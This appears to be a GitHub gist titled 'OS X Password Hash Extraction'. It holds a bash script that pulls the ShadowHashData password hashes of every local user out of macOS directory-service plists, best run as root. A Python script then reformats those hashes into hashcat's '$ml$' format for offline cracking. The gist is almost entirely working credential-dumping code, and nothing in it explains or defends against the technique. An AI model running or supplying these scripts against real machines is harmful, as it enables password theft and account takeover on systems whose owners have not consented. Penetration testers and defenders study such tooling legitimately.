Created
December 15, 2016 19:56
-
-
Save kkirsche/105ad2a1013a008666740ad86ec23448 to your computer and use it in GitHub Desktop.
OS X Password Hash Extraction
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| pat="^[0-9a-zA-Z ]{1,}\.plist" | |
| xml_pat="^<\?xml.*" | |
| if [[ $EUID -ne 0 ]]; then | |
| echo "[-] Not running as root, you probably won't see any results." | |
| fi | |
| for f in /var/db/dslocal/nodes/Default/users/* | |
| do | |
| basefile=$(basename $f) | |
| if [[ $basefile =~ $pat ]]; then | |
| xml=$(defaults read $f ShadowHashData 2>/dev/null|tr -dc 0-9a-f|xxd -r -p|plutil -convert xml1 - -o -) | |
| if [ $? -eq 0 ]; then | |
| if [[ $xml =~ $xml_pat ]]; then | |
| echo $xml | |
| fi | |
| fi | |
| fi | |
| done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/local/bin/python | |
| # Transform a plist xml export into hashcat format. | |
| # Reads from STDIN | |
| import xml.etree.ElementTree as ET | |
| import sys | |
| def main(): | |
| for line in sys.stdin.readlines(): | |
| root = ET.fromstring(line) | |
| for child in root.findall(".//data[1]"): | |
| entropy = child.text.replace(" ", "").strip() | |
| for child in root.findall(".//integer[1]"): | |
| iterations = child.text.strip() | |
| for child in root.findall(".//data[2]"): | |
| salt = child.text.strip() | |
| print "$ml$"+iterations+"$"+salt+"$"+entropy | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment